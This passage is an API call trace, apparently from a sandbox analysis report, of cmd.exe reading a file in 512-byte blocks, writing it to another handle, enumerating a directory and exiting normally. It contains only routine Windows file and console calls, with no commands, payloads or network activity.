(_FileHandle=1) returned 0x4c [0127.795] GetFileType (hFile=0x4c) returned 0x1 [0127.795] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.795] WriteFile (in: hFile=0x4c, lpBuffer=0x28ed00*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28de94, lpOverlapped=0x0 | out: lpBuffer=0x28ed00*, lpNumberOfBytesWritten=0x28de94*=0x50, lpOverlapped=0x0) returned 1 [0127.795] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.795] GetFileType (hFile=0x4c) returned 0x1 [0127.795] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.795] WriteFile (in: hFile=0x4c, lpBuffer=0x28ed50*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28de94, lpOverlapped=0x0 | out: lpBuffer=0x28ed50*, lpNumberOfBytesWritten=0x28de94*=0x50, lpOverlapped=0x0) returned 1 [0127.795] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.795] GetFileType (hFile=0x4c) returned 0x1 [0127.795] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.795] WriteFile (in: hFile=0x4c, lpBuffer=0x28eda0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28de94, lpOverlapped=0x0 | out: lpBuffer=0x28eda0*, lpNumberOfBytesWritten=0x28de94*=0x50, lpOverlapped=0x0) returned 1 [0127.795] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.795] GetFileType (hFile=0x4c) returned 0x1 [0127.795] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.795] WriteFile (in: hFile=0x4c, lpBuffer=0x28edf0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28de94, lpOverlapped=0x0 | out: lpBuffer=0x28edf0*, lpNumberOfBytesWritten=0x28de94*=0x50, lpOverlapped=0x0) returned 1 [0127.795] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.795] GetFileType (hFile=0x4c) returned 0x1 [0127.795] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.795] WriteFile (in: hFile=0x4c, lpBuffer=0x28ee40*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28de94, lpOverlapped=0x0 | out: lpBuffer=0x28ee40*, lpNumberOfBytesWritten=0x28de94*=0x50, lpOverlapped=0x0) returned 1 [0127.795] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.795] GetFileType (hFile=0x4c) returned 0x1 [0127.795] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.795] WriteFile (in: hFile=0x4c, lpBuffer=0x28ee90*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x28de94, lpOverlapped=0x0 | out: lpBuffer=0x28ee90*, lpNumberOfBytesWritten=0x28de94*=0x20, lpOverlapped=0x0) returned 1 [0127.795] _get_osfhandle (_FileHandle=4) returned 0x54 [0127.795] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x28de80 | out: lpNewFilePointer=0x0) returned 1 [0127.796] _get_osfhandle (_FileHandle=4) returned 0x54 [0127.796] ReadFile (in: hFile=0x54, lpBuffer=0x28ecb0, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28dea0, lpOverlapped=0x0 | out: lpBuffer=0x28ecb0*, lpNumberOfBytesRead=0x28dea0*=0x200, lpOverlapped=0x0) returned 1 [0127.796] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.796] GetFileType (hFile=0x4c) returned 0x1 [0127.796] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.796] GetFileType (hFile=0x4c) returned 0x1 [0127.796] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.796] WriteFile (in: hFile=0x4c, lpBuffer=0x28ecb0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28de94, lpOverlapped=0x0 | out: lpBuffer=0x28ecb0*, lpNumberOfBytesWritten=0x28de94*=0x50, lpOverlapped=0x0) returned 1 [0127.796] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.796] GetFileType (hFile=0x4c) returned 0x1 [0127.796] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.796] WriteFile (in: hFile=0x4c, lpBuffer=0x28ed00*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28de94, lpOverlapped=0x0 | out: lpBuffer=0x28ed00*, lpNumberOfBytesWritten=0x28de94*=0x50, lpOverlapped=0x0) returned 1 [0127.796] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.796] GetFileType (hFile=0x4c) returned 0x1 [0127.796] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.796] WriteFile (in: hFile=0x4c, lpBuffer=0x28ed50*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28de94, lpOverlapped=0x0 | out: lpBuffer=0x28ed50*, lpNumberOfBytesWritten=0x28de94*=0x50, lpOverlapped=0x0) returned 1 [0127.796] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.796] GetFileType (hFile=0x4c) returned 0x1 [0127.796] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.796] WriteFile (in: hFile=0x4c, lpBuffer=0x28eda0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28de94, lpOverlapped=0x0 | out: lpBuffer=0x28eda0*, lpNumberOfBytesWritten=0x28de94*=0x50, lpOverlapped=0x0) returned 1 [0127.796] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.796] GetFileType (hFile=0x4c) returned 0x1 [0127.796] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.796] WriteFile (in: hFile=0x4c, lpBuffer=0x28edf0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28de94, lpOverlapped=0x0 | out: lpBuffer=0x28edf0*, lpNumberOfBytesWritten=0x28de94*=0x50, lpOverlapped=0x0) returned 1 [0127.796] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.796] GetFileType (hFile=0x4c) returned 0x1 [0127.796] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.796] WriteFile (in: hFile=0x4c, lpBuffer=0x28ee40*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28de94, lpOverlapped=0x0 | out: lpBuffer=0x28ee40*, lpNumberOfBytesWritten=0x28de94*=0x50, lpOverlapped=0x0) returned 1 [0127.796] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.796] GetFileType (hFile=0x4c) returned 0x1 [0127.796] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.796] WriteFile (in: hFile=0x4c, lpBuffer=0x28ee90*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x28de94, lpOverlapped=0x0 | out: lpBuffer=0x28ee90*, lpNumberOfBytesWritten=0x28de94*=0x20, lpOverlapped=0x0) returned 1 [0127.796] _get_osfhandle (_FileHandle=4) returned 0x54 [0127.796] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x28de80 | out: lpNewFilePointer=0x0) returned 1 [0127.797] _get_osfhandle (_FileHandle=4) returned 0x54 [0127.797] ReadFile (in: hFile=0x54, lpBuffer=0x28ecb0, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28dea0, lpOverlapped=0x0 | out: lpBuffer=0x28ecb0*, lpNumberOfBytesRead=0x28dea0*=0x200, lpOverlapped=0x0) returned 1 [0127.797] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.797] GetFileType (hFile=0x4c) returned 0x1 [0127.797] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.797] GetFileType (hFile=0x4c) returned 0x1 [0127.797] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.797] WriteFile (in: hFile=0x4c, lpBuffer=0x28ecb0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28de94, lpOverlapped=0x0 | out: lpBuffer=0x28ecb0*, lpNumberOfBytesWritten=0x28de94*=0x50, lpOverlapped=0x0) returned 1 [0127.797] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.797] GetFileType (hFile=0x4c) returned 0x1 [0127.797] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.797] WriteFile (in: hFile=0x4c, lpBuffer=0x28ed00*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28de94, lpOverlapped=0x0 | out: lpBuffer=0x28ed00*, lpNumberOfBytesWritten=0x28de94*=0x50, lpOverlapped=0x0) returned 1 [0127.797] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.797] GetFileType (hFile=0x4c) returned 0x1 [0127.797] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.797] WriteFile (in: hFile=0x4c, lpBuffer=0x28ed50*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28de94, lpOverlapped=0x0 | out: lpBuffer=0x28ed50*, lpNumberOfBytesWritten=0x28de94*=0x50, lpOverlapped=0x0) returned 1 [0127.797] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.797] GetFileType (hFile=0x4c) returned 0x1 [0127.797] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.797] WriteFile (in: hFile=0x4c, lpBuffer=0x28eda0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28de94, lpOverlapped=0x0 | out: lpBuffer=0x28eda0*, lpNumberOfBytesWritten=0x28de94*=0x50, lpOverlapped=0x0) returned 1 [0127.797] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.797] GetFileType (hFile=0x4c) returned 0x1 [0127.797] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.797] WriteFile (in: hFile=0x4c, lpBuffer=0x28edf0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28de94, lpOverlapped=0x0 | out: lpBuffer=0x28edf0*, lpNumberOfBytesWritten=0x28de94*=0x50, lpOverlapped=0x0) returned 1 [0127.797] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.797] GetFileType (hFile=0x4c) returned 0x1 [0127.797] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.797] WriteFile (in: hFile=0x4c, lpBuffer=0x28ee40*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28de94, lpOverlapped=0x0 | out: lpBuffer=0x28ee40*, lpNumberOfBytesWritten=0x28de94*=0x50, lpOverlapped=0x0) returned 1 [0127.797] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.797] GetFileType (hFile=0x4c) returned 0x1 [0127.797] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.797] WriteFile (in: hFile=0x4c, lpBuffer=0x28ee90*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x28de94, lpOverlapped=0x0 | out: lpBuffer=0x28ee90*, lpNumberOfBytesWritten=0x28de94*=0x20, lpOverlapped=0x0) returned 1 [0127.797] _get_osfhandle (_FileHandle=4) returned 0x54 [0127.798] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x28de80 | out: lpNewFilePointer=0x0) returned 1 [0127.798] _get_osfhandle (_FileHandle=4) returned 0x54 [0127.798] ReadFile (in: hFile=0x54, lpBuffer=0x28ecb0, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28dea0, lpOverlapped=0x0 | out: lpBuffer=0x28ecb0*, lpNumberOfBytesRead=0x28dea0*=0x200, lpOverlapped=0x0) returned 1 [0127.798] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.798] GetFileType (hFile=0x4c) returned 0x1 [0127.798] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.798] GetFileType (hFile=0x4c) returned 0x1 [0127.798] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.798] WriteFile (in: hFile=0x4c, lpBuffer=0x28ecb0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28de94, lpOverlapped=0x0 | out: lpBuffer=0x28ecb0*, lpNumberOfBytesWritten=0x28de94*=0x50, lpOverlapped=0x0) returned 1 [0127.798] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.798] GetFileType (hFile=0x4c) returned 0x1 [0127.798] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.798] WriteFile (in: hFile=0x4c, lpBuffer=0x28ed00*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28de94, lpOverlapped=0x0 | out: lpBuffer=0x28ed00*, lpNumberOfBytesWritten=0x28de94*=0x50, lpOverlapped=0x0) returned 1 [0127.798] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.798] GetFileType (hFile=0x4c) returned 0x1 [0127.798] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.798] WriteFile (in: hFile=0x4c, lpBuffer=0x28ed50*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28de94, lpOverlapped=0x0 | out: lpBuffer=0x28ed50*, lpNumberOfBytesWritten=0x28de94*=0x50, lpOverlapped=0x0) returned 1 [0127.798] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.798] GetFileType (hFile=0x4c) returned 0x1 [0127.798] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.798] WriteFile (in: hFile=0x4c, lpBuffer=0x28eda0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28de94, lpOverlapped=0x0 | out: lpBuffer=0x28eda0*, lpNumberOfBytesWritten=0x28de94*=0x50, lpOverlapped=0x0) returned 1 [0127.798] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.798] GetFileType (hFile=0x4c) returned 0x1 [0127.798] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.798] WriteFile (in: hFile=0x4c, lpBuffer=0x28edf0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28de94, lpOverlapped=0x0 | out: lpBuffer=0x28edf0*, lpNumberOfBytesWritten=0x28de94*=0x50, lpOverlapped=0x0) returned 1 [0127.798] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.798] GetFileType (hFile=0x4c) returned 0x1 [0127.798] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.798] WriteFile (in: hFile=0x4c, lpBuffer=0x28ee40*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28de94, lpOverlapped=0x0 | out: lpBuffer=0x28ee40*, lpNumberOfBytesWritten=0x28de94*=0x50, lpOverlapped=0x0) returned 1 [0127.798] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.798] GetFileType (hFile=0x4c) returned 0x1 [0127.798] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.798] WriteFile (in: hFile=0x4c, lpBuffer=0x28ee90*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x28de94, lpOverlapped=0x0 | out: lpBuffer=0x28ee90*, lpNumberOfBytesWritten=0x28de94*=0x20, lpOverlapped=0x0) returned 1 [0127.799] _get_osfhandle (_FileHandle=4) returned 0x54 [0127.799] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x28de80 | out: lpNewFilePointer=0x0) returned 1 [0127.799] _get_osfhandle (_FileHandle=4) returned 0x54 [0127.799] ReadFile (in: hFile=0x54, lpBuffer=0x28ecb0, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28dea0, lpOverlapped=0x0 | out: lpBuffer=0x28ecb0*, lpNumberOfBytesRead=0x28dea0*=0x200, lpOverlapped=0x0) returned 1 [0127.799] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.799] GetFileType (hFile=0x4c) returned 0x1 [0127.799] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.799] GetFileType (hFile=0x4c) returned 0x1 [0127.799] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.799] WriteFile (in: hFile=0x4c, lpBuffer=0x28ecb0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28de94, lpOverlapped=0x0 | out: lpBuffer=0x28ecb0*, lpNumberOfBytesWritten=0x28de94*=0x50, lpOverlapped=0x0) returned 1 [0127.799] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.799] GetFileType (hFile=0x4c) returned 0x1 [0127.799] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.799] WriteFile (in: hFile=0x4c, lpBuffer=0x28ed00*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28de94, lpOverlapped=0x0 | out: lpBuffer=0x28ed00*, lpNumberOfBytesWritten=0x28de94*=0x50, lpOverlapped=0x0) returned 1 [0127.799] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.799] GetFileType (hFile=0x4c) returned 0x1 [0127.799] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.799] WriteFile (in: hFile=0x4c, lpBuffer=0x28ed50*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28de94, lpOverlapped=0x0 | out: lpBuffer=0x28ed50*, lpNumberOfBytesWritten=0x28de94*=0x50, lpOverlapped=0x0) returned 1 [0127.799] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.799] GetFileType (hFile=0x4c) returned 0x1 [0127.799] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.799] WriteFile (in: hFile=0x4c, lpBuffer=0x28eda0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28de94, lpOverlapped=0x0 | out: lpBuffer=0x28eda0*, lpNumberOfBytesWritten=0x28de94*=0x50, lpOverlapped=0x0) returned 1 [0127.799] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.799] GetFileType (hFile=0x4c) returned 0x1 [0127.800] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.800] WriteFile (in: hFile=0x4c, lpBuffer=0x28edf0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28de94, lpOverlapped=0x0 | out: lpBuffer=0x28edf0*, lpNumberOfBytesWritten=0x28de94*=0x50, lpOverlapped=0x0) returned 1 [0127.800] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.800] GetFileType (hFile=0x4c) returned 0x1 [0127.800] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.800] WriteFile (in: hFile=0x4c, lpBuffer=0x28ee40*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28de94, lpOverlapped=0x0 | out: lpBuffer=0x28ee40*, lpNumberOfBytesWritten=0x28de94*=0x50, lpOverlapped=0x0) returned 1 [0127.800] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.800] GetFileType (hFile=0x4c) returned 0x1 [0127.800] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.800] WriteFile (in: hFile=0x4c, lpBuffer=0x28ee90*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x28de94, lpOverlapped=0x0 | out: lpBuffer=0x28ee90*, lpNumberOfBytesWritten=0x28de94*=0x20, lpOverlapped=0x0) returned 1 [0127.800] _get_osfhandle (_FileHandle=4) returned 0x54 [0127.800] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x28de80 | out: lpNewFilePointer=0x0) returned 1 [0127.800] _get_osfhandle (_FileHandle=4) returned 0x54 [0127.800] ReadFile (in: hFile=0x54, lpBuffer=0x28ecb0, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28dea0, lpOverlapped=0x0 | out: lpBuffer=0x28ecb0*, lpNumberOfBytesRead=0x28dea0*=0x200, lpOverlapped=0x0) returned 1 [0127.800] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.800] GetFileType (hFile=0x4c) returned 0x1 [0127.800] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.800] GetFileType (hFile=0x4c) returned 0x1 [0127.800] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.800] WriteFile (in: hFile=0x4c, lpBuffer=0x28ecb0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28de94, lpOverlapped=0x0 | out: lpBuffer=0x28ecb0*, lpNumberOfBytesWritten=0x28de94*=0x50, lpOverlapped=0x0) returned 1 [0127.800] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.800] GetFileType (hFile=0x4c) returned 0x1 [0127.800] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.800] WriteFile (in: hFile=0x4c, lpBuffer=0x28ed00*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28de94, lpOverlapped=0x0 | out: lpBuffer=0x28ed00*, lpNumberOfBytesWritten=0x28de94*=0x50, lpOverlapped=0x0) returned 1 [0127.801] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.801] GetFileType (hFile=0x4c) returned 0x1 [0127.801] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.801] WriteFile (in: hFile=0x4c, lpBuffer=0x28ed50*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28de94, lpOverlapped=0x0 | out: lpBuffer=0x28ed50*, lpNumberOfBytesWritten=0x28de94*=0x50, lpOverlapped=0x0) returned 1 [0127.801] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.801] GetFileType (hFile=0x4c) returned 0x1 [0127.801] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.801] WriteFile (in: hFile=0x4c, lpBuffer=0x28eda0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28de94, lpOverlapped=0x0 | out: lpBuffer=0x28eda0*, lpNumberOfBytesWritten=0x28de94*=0x50, lpOverlapped=0x0) returned 1 [0127.801] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.801] GetFileType (hFile=0x4c) returned 0x1 [0127.801] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.801] WriteFile (in: hFile=0x4c, lpBuffer=0x28edf0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28de94, lpOverlapped=0x0 | out: lpBuffer=0x28edf0*, lpNumberOfBytesWritten=0x28de94*=0x50, lpOverlapped=0x0) returned 1 [0127.801] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.801] GetFileType (hFile=0x4c) returned 0x1 [0127.801] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.801] WriteFile (in: hFile=0x4c, lpBuffer=0x28ee40*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28de94, lpOverlapped=0x0 | out: lpBuffer=0x28ee40*, lpNumberOfBytesWritten=0x28de94*=0x50, lpOverlapped=0x0) returned 1 [0127.801] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.801] GetFileType (hFile=0x4c) returned 0x1 [0127.801] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.801] WriteFile (in: hFile=0x4c, lpBuffer=0x28ee90*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x28de94, lpOverlapped=0x0 | out: lpBuffer=0x28ee90*, lpNumberOfBytesWritten=0x28de94*=0x20, lpOverlapped=0x0) returned 1 [0127.801] _get_osfhandle (_FileHandle=4) returned 0x54 [0127.801] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x28de80 | out: lpNewFilePointer=0x0) returned 1 [0127.801] _get_osfhandle (_FileHandle=4) returned 0x54 [0127.802] ReadFile (in: hFile=0x54, lpBuffer=0x28ecb0, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28dea0, lpOverlapped=0x0 | out: lpBuffer=0x28ecb0*, lpNumberOfBytesRead=0x28dea0*=0x200, lpOverlapped=0x0) returned 1 [0127.802] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.802] GetFileType (hFile=0x4c) returned 0x1 [0127.802] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.802] GetFileType (hFile=0x4c) returned 0x1 [0127.802] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.802] WriteFile (in: hFile=0x4c, lpBuffer=0x28ecb0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28de94, lpOverlapped=0x0 | out: lpBuffer=0x28ecb0*, lpNumberOfBytesWritten=0x28de94*=0x50, lpOverlapped=0x0) returned 1 [0127.802] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.802] GetFileType (hFile=0x4c) returned 0x1 [0127.802] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.802] WriteFile (in: hFile=0x4c, lpBuffer=0x28ed00*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28de94, lpOverlapped=0x0 | out: lpBuffer=0x28ed00*, lpNumberOfBytesWritten=0x28de94*=0x50, lpOverlapped=0x0) returned 1 [0127.802] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.802] GetFileType (hFile=0x4c) returned 0x1 [0127.802] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.802] WriteFile (in: hFile=0x4c, lpBuffer=0x28ed50*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28de94, lpOverlapped=0x0 | out: lpBuffer=0x28ed50*, lpNumberOfBytesWritten=0x28de94*=0x50, lpOverlapped=0x0) returned 1 [0127.802] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.802] GetFileType (hFile=0x4c) returned 0x1 [0127.802] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.802] WriteFile (in: hFile=0x4c, lpBuffer=0x28eda0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28de94, lpOverlapped=0x0 | out: lpBuffer=0x28eda0*, lpNumberOfBytesWritten=0x28de94*=0x50, lpOverlapped=0x0) returned 1 [0127.802] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.802] GetFileType (hFile=0x4c) returned 0x1 [0127.802] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.802] WriteFile (in: hFile=0x4c, lpBuffer=0x28edf0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28de94, lpOverlapped=0x0 | out: lpBuffer=0x28edf0*, lpNumberOfBytesWritten=0x28de94*=0x50, lpOverlapped=0x0) returned 1 [0127.803] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.803] GetFileType (hFile=0x4c) returned 0x1 [0127.803] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.803] WriteFile (in: hFile=0x4c, lpBuffer=0x28ee40*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28de94, lpOverlapped=0x0 | out: lpBuffer=0x28ee40*, lpNumberOfBytesWritten=0x28de94*=0x50, lpOverlapped=0x0) returned 1 [0127.803] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.803] GetFileType (hFile=0x4c) returned 0x1 [0127.803] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.803] WriteFile (in: hFile=0x4c, lpBuffer=0x28ee90*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x28de94, lpOverlapped=0x0 | out: lpBuffer=0x28ee90*, lpNumberOfBytesWritten=0x28de94*=0x20, lpOverlapped=0x0) returned 1 [0127.803] _get_osfhandle (_FileHandle=4) returned 0x54 [0127.803] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x28de80 | out: lpNewFilePointer=0x0) returned 1 [0127.803] _get_osfhandle (_FileHandle=4) returned 0x54 [0127.803] ReadFile (in: hFile=0x54, lpBuffer=0x28ecb0, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28dea0, lpOverlapped=0x0 | out: lpBuffer=0x28ecb0*, lpNumberOfBytesRead=0x28dea0*=0x32, lpOverlapped=0x0) returned 1 [0127.803] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.803] GetFileType (hFile=0x4c) returned 0x1 [0127.803] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.803] GetFileType (hFile=0x4c) returned 0x1 [0127.803] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.803] WriteFile (in: hFile=0x4c, lpBuffer=0x28ecb0*, nNumberOfBytesToWrite=0x32, lpNumberOfBytesWritten=0x28de94, lpOverlapped=0x0 | out: lpBuffer=0x28ecb0*, lpNumberOfBytesWritten=0x28de94*=0x32, lpOverlapped=0x0) returned 1 [0127.803] _get_osfhandle (_FileHandle=4) returned 0x54 [0127.803] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x28de80 | out: lpNewFilePointer=0x0) returned 1 [0127.803] _close (_FileHandle=4) returned 0 [0127.804] FindNextFileW (in: hFindFile=0x2e0ee0, lpFindFileData=0x28ef14 | out: lpFindFileData=0x28ef14) returned 0 [0127.862] GetLastError () returned 0x12 [0127.862] FindClose (in: hFindFile=0x2e0ee0 | out: hFindFile=0x2e0ee0) returned 1 [0127.862] _dup2 (_FileHandleSrc=3, _FileHandleDst=1) returned 0 [0127.863] _close (_FileHandle=3) returned 0 [0127.863] _get_osfhandle (_FileHandle=1) returned 0x7 [0127.863] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0127.863] _get_osfhandle (_FileHandle=1) returned 0x7 [0127.863] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0127.863] _get_osfhandle (_FileHandle=0) returned 0x3 [0127.863] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0127.863] SetConsoleInputExeNameW () returned 0x1 [0127.863] GetConsoleOutputCP () returned 0x1b5 [0127.863] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0127.863] SetThreadUILanguage (LangId=0x0) returned 0x409 [0127.863] exit (_Code=0) Process: id = "82" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" 